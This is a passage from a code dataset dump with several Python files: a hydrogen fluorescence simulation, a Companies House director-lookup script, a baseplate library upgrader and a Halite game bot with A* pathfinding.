rabi\r\n return H\r\n \r\ndef convert(H,P):\r\n return np.dot(P,np.dot(H,P.transpose()))\r\n\r\n##### POPULATIONS ET FLUORESCENCE #####\r\ndef matrice_densite(f=0,B=180,v=3,rabi=0.01):\r\n H = np.zeros((N,N),dtype=complex)\r\n H += convert(H_SFHF(),LJF_vers_LJI()) \\\r\n + convert(H_Zeeman(B),LSI_vers_LJI()) \\\r\n + H_Stark(B)*v \\\r\n + H_2photons(rabi)\r\n \r\n for i,u in enumerate(LJFmF()):\r\n if getattr(u,'n')==1 and getattr(u,'mF')==1:\r\n E1S = H_SFHF()[i,i]\r\n if getattr(u,'n')==3 and getattr(u,'L')==0 and getattr(u,'mF')==1:\r\n E3S = H_SFHF()[i,i]\r\n f += (E3S - E1S)*(1 + (v*1E3)**2/(2*c**2)) # avec v en km/s\r\n\r\n C = np.zeros((N,N),dtype=complex)\r\n for i,a in enumerate(LJmJmI()):\r\n for j,d in enumerate(LJmJmI()):\r\n C[i,j] = -1j/(4*np.pi)*(gamma[(a.n,a.L)] + gamma[(d.n,d.L)])\r\n if a.n==1 and d.n==3:\r\n C[i,j] += f\r\n if a.n==3 and d.n==1:\r\n C[i,j] -= f\r\n \r\n A = np.zeros((N**2,N**2),dtype=complex)\r\n B = np.zeros(N**2,dtype=complex) \r\n k = 0\r\n for i in range(N):\r\n for j in range(N):\r\n A_ij = np.zeros((N,N),dtype=complex)\r\n A_ij[:,j] = H[i,:].transpose()\r\n A_ij[i,:] -= H[:,j].transpose()\r\n A_ij[i,j] += C[i,j]\r\n A[k,:] = A_ij.reshape((1,N**2))\r\n k += 1\r\n for i in range(4): # si les niveaux 1S sont les 4 premiers de la base\r\n B[i*(N+1)] += -1j\r\n\r\n X = np.linalg.solve(A,B)\r\n return X.reshape((N,N))\r\n\r\ndef coefv(v,sigma,vo): #(Olander70, Arnoult thèse, Galtier thèse)\r\n xd = 6.5e-6 # taille de la zone de détection/2 en km\r\n zr = 35e-6 # longueur de Rayleigh en km\r\n taue = 1e-6/(2*np.pi) # durée de vie en s \r\n z = v/(np.sqrt(2)*sigma)\r\n psi = (z*np.exp(-z**2)+np.sqrt(np.pi)/2.*(1+2*z**2)*erf(z)) \\\r\n /(np.sqrt(2*np.pi)*z**2)\r\n K = 0.01\r\n maxwell = 4./np.sqrt(np.pi)*z**2*np.exp(-z**2)\r\n olander = np.sqrt(np.pi)/2.*np.sqrt(erf(psi/(2*K)))/np.sqrt(psi/(2*K))\r\n olivier = np.arctan((xd-v*taue)/zr)+np.arctan((xd+v*taue)/zr)\r\n return maxwell*olander*olivier*np.exp(-vo/v)\r\n\r\n#def 
forme_de_raie(B,sigma,v0):\r\n# debut = time.time()\r\n# frequences = np.linspace(-5,5,1001) # en MHz\r\n# vitesses = np.linspace(0.1,10.1,101) # en km/s (v non nul pour coefv)\r\n# normalisation = quad(lambda x:coefv(x,sigma,vo),0.1,10.1)[0] \r\n# fluo = np.zeros(len(frequences))\r\n# fluo_v = np.zeros(len(vitesses))\r\n# for i,delta in enumerate(frequences):\r\n# for j,v in enumerate(vitesses):\r\n# w = 'delta E 1S-3S avec LS' + v**2*nu0/(2*c**2)\r\n# pop = np.diag(matrice_densite(w,B,v))[4:,4:]\r\n# fluo_v[j] = gamma[(3,0)]*np.sum(pop[:4]) \\\r\n# + branch_3P*gamma[(3,1)]*np.sum(pop[4:]) \\\r\n# * coefv(v,sigma,v0)\r\n# fluo[i] = quad(interp1d(vitesses,fluo_v[:,k],kind='cubic'),0.1,10.1)[0]\r\n# fluo[i] *= 1/normalisation\r\n# print 'Calcul fini pour B =',B,', sigma =',sigma,', v0 =',vo, \\\r\n# ', en ',int(time.time()-debut),' s'\r\n# return frequences,fluo*1000", "sub_path": "fluo3S_H_juin17_II.py", "file_name": "fluo3S_H_juin17_II.py", "file_ext": "py", "file_size_in_byte": 8022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 169, "usage_type": "attribute"}, {"api_name": "scipy.special.erf", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 172, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.sqrt", 
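matrice_densite builds the Liouvillian row by row and solves A·vec(ρ) = B with numpy.linalg.solve. The same vectorization trick on a toy 2-level system, as a sketch; the Hamiltonian, widths and source term are arbitrary illustrative numbers, not values from this experiment:

import numpy as np

N = 2
H = np.array([[0.0, 0.5], [0.5, 1.0]], dtype=complex)  # toy Hamiltonian
g = [0.0, 1.0]                                         # toy level widths
C = np.array([[-0.5j * (g[i] + g[j]) for j in range(N)]
              for i in range(N)])                      # relaxation terms

A = np.zeros((N**2, N**2), dtype=complex)
B = np.zeros(N**2, dtype=complex)
k = 0
for i in range(N):
    for j in range(N):
        A_ij = np.zeros((N, N), dtype=complex)
        A_ij[:, j] = H[i, :].transpose()   # (H rho)_ij contribution
        A_ij[i, :] -= H[:, j].transpose()  # (rho H)_ij contribution
        A_ij[i, j] += C[i, j]              # damping, as in the original
        A[k, :] = A_ij.reshape(N**2)
        k += 1
B[0] = -1j  # source feeding the ground state, mirroring B[i*(N+1)] += -1j

rho = np.linalg.solve(A, B).reshape(N, N)  # steady-state density matrix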
"line_number": 173, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 173, "usage_type": "attribute"}, {"api_name": "scipy.special.erf", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "506795433", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport csv\nimport sys\nimport json\nimport datetime\nimport argparse\nfrom time import sleep\nfrom requests import HTTPError\n\nfrom companies_house.api import CompaniesHouseAPI\n\n_NUM_SC_PREF = \"SC\"\n_LAST_FILE_DEFAULT = 'last.json.sample.sample'\n_RESULT_CSV_DEFAULT = \"result.csv\"\n_API_KEY = os.getenv('API_KEY')\n\n\n# ------------------------------------------------------------------------------\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--last\", action='store', dest='last_file',\n help=\"last file path\", default=_LAST_FILE_DEFAULT)\n parser.add_argument(\"-o\", \"--out\", action='store', dest='result_file',\n help=\"Where result will be stored\", default=_RESULT_CSV_DEFAULT)\n parser.add_argument(\"-r\", \"--ratelimit-freeze\", action='store', dest='ratelimit',\n help=\"Where result will be stored\", default=50)\n parser.add_argument(\"-e\", \"--empty-limit\", action='store', dest='empty_limit',\n help=\"How much empty companies threat as end of list\", default=20)\n\n return parser.parse_args()\n\n\n# ------------------------------------------------------------------------------\n\ndef get_director(number: str, ch: CompaniesHouseAPI) -> str:\n director: str = \"\"\n psc = ch.list_company_officers(company_number=number)\n if not psc:\n psc = ch.list_company_persons_with_significant_control(company_number=number)\n if not psc:\n psc = ch.list_company_persons_with_significant_control_statements(company_number=number)\n if not psc:\n return None\n\n if psc.get(\"active_count\") == 1:\n officers = psc.get(\"items\")\n for officer in officers:\n if officer.get(\"officer_role\") == \"director\":\n director = officer.get(\"name\")\n return director\n\n\n# ------------------------------------------------------------------------------\n\n# noinspection PyPackageRequirements,PyPackageRequirements\ndef get_address(company: dict) -> tuple:\n registered_office_address = company.get(\"registered_office_address\")\n address = str(registered_office_address.get(\"address_line_1\"))\n country = str(registered_office_address.get(\"country\"))\n city = str(registered_office_address.get(\"locality\"))\n postal_code = str(registered_office_address.get(\"postal_code\"))\n\n return address, country, city, postal_code\n\n\n# ------------------------------------------------------------------------------\n\ndef get_company_details(number: str, ch: CompaniesHouseAPI) -> list:\n company: dict = {}\n res = None\n try:\n company = ch.get_company(company_number=number)\n except HTTPError as e:\n print(\"Companies House API returned error %sn \" % str(e)) # Sometimes companies house returns 502\n sleep(15) # we ill just wait 15 seconds and than retry\n company = ch.get_company(company_number=number)\n if not company:\n res = None\n if company: # checking for empty dict\n creation_date = datetime.datetime.strptime(company.get(\"date_of_creation\"), \"%Y-%m-%d\").date()\n time_delta = (datetime.datetime.now().date() - creation_date).days\n print(\"Company was registered \" + str(time_delta) + \" days ago\")\n if 
# noinspection PyPackageRequirements\ndef get_address(company: dict) -> tuple:\n    registered_office_address = company.get("registered_office_address")\n    address = str(registered_office_address.get("address_line_1"))\n    country = str(registered_office_address.get("country"))\n    city = str(registered_office_address.get("locality"))\n    postal_code = str(registered_office_address.get("postal_code"))\n\n    return address, country, city, postal_code\n\n\n# ------------------------------------------------------------------------------\n\ndef get_company_details(number: str, ch: CompaniesHouseAPI) -> list:\n    company: dict = {}\n    res = None\n    try:\n        company = ch.get_company(company_number=number)\n    except HTTPError as e:\n        print("Companies House API returned error %s " % str(e))  # Sometimes Companies House returns 502\n        sleep(15)  # we will just wait 15 seconds and then retry\n        company = ch.get_company(company_number=number)\n    if company:  # checking for empty dict\n        creation_date = datetime.datetime.strptime(company.get("date_of_creation"), "%Y-%m-%d").date()\n        time_delta = (datetime.datetime.now().date() - creation_date).days\n        print("Company was registered " + str(time_delta) + " days ago")\n        if company.get("company_status") == "active" and "registered_office_address" in company and company.get(\n                'type') == "ltd":\n            director = get_director(number, ch)\n            name = company["company_name"]\n            if director:\n\n                address, country, city, postal_code = get_address(company)\n                print(name)\n                print(director)\n                print(address)\n                print(number)\n                res = [[str(name).replace(',', ' '),\n                        str(director).replace(',', ' '),\n                        str(address).replace(',', ' '),\n                        str(country).replace(',', ' '),\n                        str(city).replace(',', ' '),\n                        str(postal_code).replace(',', ' ')]]\n                return res\n    else:\n        res = -1\n        print(str(number) + " company does not exist or does not meet our requirements")\n    return res\n\n\n# ------------------------------------------------------------------------------\n\n\ndef main():\n    args = get_args()\n    ch = CompaniesHouseAPI(_API_KEY, int(args.ratelimit))\n    _LAST_NUM_SC = 0\n    _LAST_NUM_BR = 0\n    empty_counter = 0\n    empty_limit = int(args.empty_limit)\n    with open(args.last_file, 'r+') as last_file:\n        data = json.load(last_file)\n        _LAST_NUM_BR = int(data["british_company_last_number"])\n        _LAST_NUM_SC = int(data["scottish_company_last_number"])\n\n        # British companies\n        with open(args.result_file, "a+", newline='') as res:\n            res.write("Company, Fullname, Address, Country, City, Postal Code\n")\n            writer = csv.writer(res)\n            while True:\n                _LAST_NUM_BR += 1\n                details = get_company_details(_LAST_NUM_BR, ch)\n                print(details)\n                if not details:  # None: API error, or the company did not meet our requirements\n                    continue\n                if details == -1:\n                    print("Empty counter 1 " + str(empty_counter))\n\n                    if empty_counter == empty_limit:\n                        _LAST_NUM_BR = _LAST_NUM_BR - 1\n                        print("Empty counter 2 " + str(empty_counter))\n                        break\n                    else:\n                        empty_counter += 1\n                        continue\n                empty_counter = 0\n                writer.writerows(details)\n\n            # Scottish companies\n            empty_counter = 0\n            while True:\n                _LAST_NUM_SC += 1\n                details = get_company_details("SC" + str(_LAST_NUM_SC), ch)\n                if not details:\n                    continue\n                if details == -1:\n                    if empty_counter == empty_limit:\n                        _LAST_NUM_SC = _LAST_NUM_SC - 1\n                        break\n                    else:\n                        empty_counter += 1\n                        continue\n                empty_counter = 0\n                writer.writerows(details)\n        data["british_company_last_number"] = _LAST_NUM_BR - empty_limit  # because we counted empty_limit extra numbers past the last real company\n        data["scottish_company_last_number"] = _LAST_NUM_SC - empty_limit\n        last_file.seek(0)\n        last_file.truncate()\n        json.dump(data, last_file)\n    exit(0)\n\n# ------------------------------------------------------------------------------\n\n\nif __name__ == "__main__":\n    sys.exit(main())\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 39, "usage_type": "name"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 72, "usage_type": "name"}, {"api_name": "requests.HTTPError", "line_number": 77, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 85, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 85, "usage_type": "attribute"}, {"api_name": "companies_house.api.CompaniesHouseAPI", "line_number": 116, "usage_type": "call"}, {"api_name": "json.load", "line_number": 122, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 169, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "555057515", "text": "import logging\nimport re\n\nfrom pathlib import Path\nfrom typing import Match\nfrom typing import Optional\n\nfrom ...python_version import PythonVersion\nfrom ...refactor import refactor_python_files\nfrom ...requirements import RequirementsFile\nfrom ...wheelhouse import Wheelhouse\n\n\nRENAMES = {\n \"baseplate._compat\": None,\n \"baseplate.config\": \"baseplate.lib.config\",\n \"baseplate.context\": \"baseplate.clients\",\n \"baseplate.core.AuthenticationToken\": \"baseplate.lib.edge_context.AuthenticationToken\",\n \"baseplate.core.AuthenticationTokenValidator\": \"baseplate.lib.edge_context.AuthenticationTokenValidator\",\n \"baseplate.core\": \"baseplate\",\n \"baseplate.core.EdgeRequestContext\": \"baseplate.lib.edge_context.EdgeRequestContext\",\n \"baseplate.core.EdgeRequestContextFactory\": \"baseplate.lib.edge_context.EdgeRequestContextFactory\",\n \"baseplate.core.InvalidAuthenticationToken\": \"baseplate.lib.edge_context.InvalidAuthenticationToken\",\n \"baseplate.core.NoAuthenticationError\": \"baseplate.lib.edge_context.NoAuthenticationError\",\n \"baseplate.core.OAuthClient\": \"baseplate.lib.edge_context.OAuthClient\",\n \"baseplate.core.Service\": \"baseplate.lib.edge_context.Service\",\n \"baseplate.core.Session\": \"baseplate.lib.edge_context.Session\",\n \"baseplate.core.User\": \"baseplate.lib.edge_context.User\",\n \"baseplate.core.ValidatedAuthenticationToken\": \"baseplate.lib.edge_context.ValidatedAuthenticationToken\",\n \"baseplate.crypto\": \"baseplate.lib.crypto\",\n \"baseplate.crypto.constant_time_compare\": \"hmac.compare_digest\",\n \"baseplate.datetime\": \"baseplate.lib.datetime\",\n \"baseplate.diagnostics\": \"baseplate.observers\",\n \"baseplate.diagnostics.tracing.publisher\": \"baseplate.sidecars.trace_publisher\",\n \"baseplate.error_reporter_from_config\": \"baseplate.observers.sentry.error_reporter_from_config\",\n \"baseplate.events\": \"baseplate.lib.events\",\n \"baseplate.events.publisher\": \"baseplate.sidecars.event_publisher\",\n \"baseplate.events.publisher.gzip_compress\": \"gzip.compress\",\n \"baseplate.events.publisher.V1Batch\": None,\n \"baseplate.events.queue\": \"baseplate.lib.events\",\n \"baseplate.events.queue.Event\": None,\n \"baseplate.events.queue.FieldKind\": None,\n \"baseplate.events.queue.serialize_v1_event\": None,\n \"baseplate.experiments\": \"baseplate.lib.experiments\",\n \"baseplate.file_watcher\": \"baseplate.lib.file_watcher\",\n \"baseplate.frameworks.wrapped_context\": None,\n \"baseplate.integration\": \"baseplate.frameworks\",\n \"baseplate.integration.pyramid.TRACE_HEADER_NAMES\": None,\n \"baseplate.integration.thrift._extract_trace_info\": None,\n \"baseplate.integration.thrift.TRACE_HEADER_NAMES\": None,\n \"baseplate.integration.thrift.RequestContext\": \"baseplate.RequestContext\",\n \"baseplate.live_data\": \"baseplate.lib.live_data\",\n \"baseplate.live_data.watcher\": \"baseplate.sidecars.live_data_watcher\",\n \"baseplate.message_queue\": \"baseplate.lib.message_queue\",\n \"baseplate.metrics\": \"baseplate.lib.metrics\",\n 
\"baseplate.metrics_client_from_config\": \"baseplate.lib.metrics.metrics_client_from_config\",\n \"baseplate.queue_consumer\": \"baseplate.frameworks.queue_consumer\",\n \"baseplate.queue_consumer.ConsumerContext\": \"baseplate.RequestContext\",\n \"baseplate.random\": \"baseplate.lib.random\",\n \"baseplate.ratelimit\": \"baseplate.lib.ratelimit\",\n \"baseplate.requests\": \"baseplate.lib._requests\",\n \"baseplate.retry\": \"baseplate.lib.retry\",\n \"baseplate.secrets\": \"baseplate.lib.secrets\",\n \"baseplate.secrets.fetcher\": \"baseplate.sidecars.secrets_fetcher\",\n \"baseplate.secrets.store\": \"baseplate.lib.secrets\",\n \"baseplate.service_discovery\": \"baseplate.lib.service_discovery\",\n \"baseplate.thrift_pool\": \"baseplate.lib.thrift_pool\",\n \"baseplate.tracing_client_from_config\": \"baseplate.observers.tracing.tracing_client_from_config\",\n \"baseplate._utils\": \"baseplate.lib\",\n \"baseplate._utils.Batch\": \"baseplate.sidecars.Batch\",\n \"baseplate._utils.BatchFull\": \"baseplate.sidecars.BatchFull\",\n \"baseplate._utils.RawJSONBatch\": \"baseplate.sidecars.RawJSONBatch\",\n \"baseplate._utils.SerializedBatch\": \"baseplate.sidecars.SerializedBatch\",\n \"baseplate._utils.TimeLimitedBatch\": \"baseplate.sidecars.TimeLimitedBatch\",\n}\n\n\nBASEPLATE_NAME_RE = re.compile(r\"(?Pbaseplate\\.(?:[A-Za-z_][A-Za-z0-9_]*\\.?)+)\")\n\n\nclass NameRemovedError(Exception):\n def __init__(self, name: str):\n super().__init__(\n f\"{repr(name)} does not exist anymore. Remove references to it.\"\n )\n\n\ndef get_new_name(name: str) -> Optional[str]:\n \"\"\"Find the most appropriate replacement for a name.\n\n This prefers longest (more-specific) matches over shorter ones. If the\n symbol does not need to be renamed, None is returned.\n\n \"\"\"\n for old, new in sorted(RENAMES.items(), key=lambda i: len(i[0]), reverse=True):\n if name == old or name.startswith(old + \".\"):\n if new is None:\n raise NameRemovedError(old)\n\n try:\n return name.replace(old, new, 1)\n except KeyError:\n return None\n return None\n\n\ndef replace_module_references(corpus: str) -> str:\n \"\"\"Replace references to modules in a body of text.\"\"\"\n\n def replace_name(m: Match[str]) -> str:\n old_name = m[\"name\"]\n try:\n new_name = get_new_name(old_name)\n except NameRemovedError:\n new_name = None\n return new_name or old_name\n\n return BASEPLATE_NAME_RE.sub(replace_name, corpus, re.MULTILINE)\n\n\ndef update(\n root: Path,\n python_version: Optional[PythonVersion],\n requirements_file: RequirementsFile,\n wheelhouse: Wheelhouse,\n) -> int:\n if python_version:\n if python_version < (3, 6):\n logging.error(\n \"Baseplate 1.0 requires Python 3.6+. Please upgrade Python first.\"\n )\n return 1\n else:\n logging.warning(\n \"Baseplate 1.0 requires Python 3.6+. 
Ensure Python is new enough.\"\n )\n\n refactor_python_files(root, __name__)\n\n wheelhouse.ensure(requirements_file, \"cassandra-driver>=3.13.0\")\n wheelhouse.ensure(requirements_file, \"cqlmapper>=0.2.0\")\n wheelhouse.ensure(requirements_file, \"gevent>=1.3\")\n wheelhouse.ensure(requirements_file, \"hvac>=0.2.17\")\n wheelhouse.ensure(requirements_file, \"kazoo>=2.5.0\")\n wheelhouse.ensure(requirements_file, \"kombu>=4.0.0\")\n wheelhouse.ensure(requirements_file, \"posix_ipc>=1.0.0\")\n wheelhouse.ensure(requirements_file, \"pyjwt>=1.6.0\")\n wheelhouse.ensure(requirements_file, \"pymemcache>=1.3.0,<=2.0.0\")\n wheelhouse.ensure(requirements_file, \"pyramid>=1.9.0\")\n wheelhouse.ensure(requirements_file, \"redis>=2.10.0,<=3.0.0\")\n wheelhouse.ensure(requirements_file, \"requests>=2.21.0\")\n wheelhouse.ensure(requirements_file, \"sqlalchemy>=1.1.0\")\n wheelhouse.ensure(requirements_file, \"thrift>=0.12.0\")\n\n for path in root.glob(\"**/*\"):\n if path.suffix in (\".ini\", \".txt\", \".md\", \".rst\"):\n try:\n old = path.read_text(\"utf8\")\n new = replace_module_references(old)\n if new != old:\n logging.info(\"Updated references in %s\", path)\n with path.open(\"w\", encoding=\"utf8\") as f:\n f.write(new)\n except OSError as exc:\n logging.warning(\"Can't fix references in %s: %s\", path, exc)\n\n return 0\n", "sub_path": "baseplate.py-upgrader/baseplate_py_upgrader/fixes/v1_0/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 78, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 88, "usage_type": "name"}, {"api_name": "typing.Match", "line_number": 110, "usage_type": "name"}, {"api_name": "re.MULTILINE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "python_version.PythonVersion", "line_number": 123, "usage_type": "name"}, {"api_name": "requirements.RequirementsFile", "line_number": 124, "usage_type": "name"}, {"api_name": "wheelhouse.Wheelhouse", "line_number": 125, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 134, "usage_type": "call"}, {"api_name": "refactor.refactor_python_files", "line_number": 138, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 140, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 141, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 142, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 143, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 144, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 145, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 146, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 147, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 148, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 149, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 150, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 151, "usage_type": "call"}, {"api_name": "wheelhouse.ensure", "line_number": 152, "usage_type": "call"}, 
{"api_name": "wheelhouse.ensure", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 161, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "412009887", "text": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# # Execution environment\n\n# %%\nprint(\"Import started\")\nfrom kaggle_environments import make\nfrom kaggle_environments.envs.halite.helpers import *\nimport random\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom queue import PriorityQueue\nprint(\"Import ended\")\n\n# %% [markdown]\n# # Test Environment\n\n# %%\nenvironment = make(\"halite\", configuration={\"size\": 21, \"startingHalite\": 25000}, debug=True)\nagent_count = 4\nenvironment.reset(agent_count)\nstate = environment.state[0]\nboard = Board(state.observation, environment.configuration)\n\n# %% [markdown]\n# # Framework\n# \n# ## Static\n# Static\n# \n# ## Navigation\n# Contains helper functions related to *Points* and *Movement*\n# \n# #### State variables\n# \n# self.next: Numpy array of (SIZE,SIZE) boolean encoded ally unit position on next turn.\n# \n# #### Methods\n# \n# safeMoveTo: \n# A* \"safe\" movement\n# \n# dist: \n# distance between two Points\n# \n# directionTo:\n# returns ShipAction. From start to end\n# \n# ## Calculator\n# Encodes *Board* to numpy array and runs most computationally intensive calculations and heuristics.\n# \n# #### Methods\n# \n# Update: Runs every turn. A pipeline for all calculations.\n# Encode: encodes a board into numpy arrays:\n# \n# #### States\n# \n# shipMap,shipyardMap: \n# 4D tensor, each dimension a matrix boolean encoding ship/shipyards of a single player (the dimension)\n# \n# haliteMap: \n# Matrix of haliteMap\n# \n# enemyShipHalite: \n# Matrix of enemyShips, encoded by amount of Halite. Used to threshold.\n# \n# ally: \n# My ships.\n# \n# controlMap: \n# Heuristic of map control and domination.\n# \n# \n# \n\n# %%\n# Static\nnav, calc = None, None\n\n#TODO: Move CFG to static?\n\n\nclass Navigation:\n\n # Helper\n def __init__(self, board: Board):\n self.CFG = board.configuration\n\n def dist(self, a: Point, b: Point) -> int:\n return min(abs(a.x - b.x), self.CFG.size - abs(a.x - b.x)) + min(abs(a.y - b.y), self.CFG.size - abs(a.y - b.y))\n\n def directionTo(self, s: Point, t: Point) -> ShipAction:\n candidate = [] # [N/S, E/W]\n if s.x - t.x != 0:\n candidate.append(ShipAction.WEST if (s.x - t.x) % self.CFG.size < (t.x - s.x) % self.CFG.size else ShipAction.EAST)\n if s.y - t.y != 0:\n candidate.append(ShipAction.SOUTH if (s.y - t.y) % self.CFG.size < (t.y - s.y) % self.CFG.size else ShipAction.NORTH)\n return random.choice(candidate) if len(candidate) > 0 else None\n\n def unpack(self, n):\n return Point(n // self.CFG.size, n % self.CFG.size)\n\n # Navigation\n def update(self):\n self.next = np.zeros((self.CFG.size,self.CFG.size))\n \n\n def safeMoveTo(self, s : Ship, t : Point): #A* Movement. Suggested move by priority.\n\n sPos = s.position\n\n #1. Obstacle Calculation\n\n #Obstacle are \"walls\" on the nav graph. Consist of the points of\n #Enemy ships with less halite (threshold => enemy block)\n #Enemy shipyards \n #Position of friendly on next turn\n\n #2. Navigation\n\n #A* \n\n #sPos: start position\n #pred: predecessor of a node. 
(Which point was relaxed to find the next point)\r\n        #dist: distance from sPos to a point\r\n        #pqMap: maps priorities in the queue to the points to process\r\n        #t: initially the target point; during reconstruction it becomes the "next" point on the A* path\r\n\r\n        #Algorithm: start from sPos and put it in the priority queue.\r\n        #While the queue is not empty and the target has not been found, relax the next node\r\n        #in the queue, adding adjacent points (processPoint) to the queue.\r\n\r\n        #Check whether t is reachable (pred not None).\r\n        #If it is, follow pred back until sPos is reached to recover the path.\r\n        #Otherwise, move randomly.\r\n\r\n        #Swapping:\r\n        #If a ship wants to stay still but cannot (an ally claims the square next turn via self.next),\r\n        #it moves randomly. A ship with a goal therefore keeps moving toward it, friendly ships included,\r\n        #since obstacles are derived from self.next. Because moves are processed in priority order,\r\n        #higher-priority ships are never blocked by lower-priority ones.\r\n\r\n        threshold = s.halite\r\n        enemyBlock = np.where(calc.enemyShipHalite <= threshold, 1, 0)\r\n        enemyBlock = enemyBlock + calc.enemyShipyard\r\n        blocked = self.next + enemyBlock\r\n        blocked = np.where(blocked>0,1,0)\r\n        #TODO: Improve obstacle calculation\r\n\r\n        #Stay still\r\n        if sPos == t:\r\n            #Someone with higher priority needs this position, so we must move\r\n            if self.next[t.x][t.y]:\r\n                for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\r\n                    processPoint = sPos.translate(Point(offX,offY),self.CFG.size)\r\n                    if not blocked[processPoint.x][processPoint.y]:\r\n                        self.next[processPoint.x][processPoint.y] = 1\r\n                        return self.directionTo(sPos,processPoint)\r\n                self.next[sPos.x][sPos.y] = 1\r\n                return None\r\n            else:\r\n                self.next[sPos.x][sPos.y] = 1\r\n                return None\r\n\r\n        #A*\r\n        pred = {}\r\n        dist = {}\r\n        pq = PriorityQueue()\r\n        pqMap = {}\r\n\r\n        pqMap[self.dist(sPos,t)] = [sPos]\r\n        pq.put(self.dist(sPos,t))\r\n        pred[sPos] = sPos\r\n        dist[sPos] = self.dist(sPos,t)\r\n\r\n        # Main\r\n\r\n        while not pq.empty():\r\n            if t in dist:\r\n                break\r\n            currentPoint = pqMap.get(pq.get()).pop()\r\n            for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\r\n                processPoint = currentPoint.translate(Point(offX,offY),self.CFG.size)\r\n                if blocked[processPoint.x][processPoint.y] or processPoint in 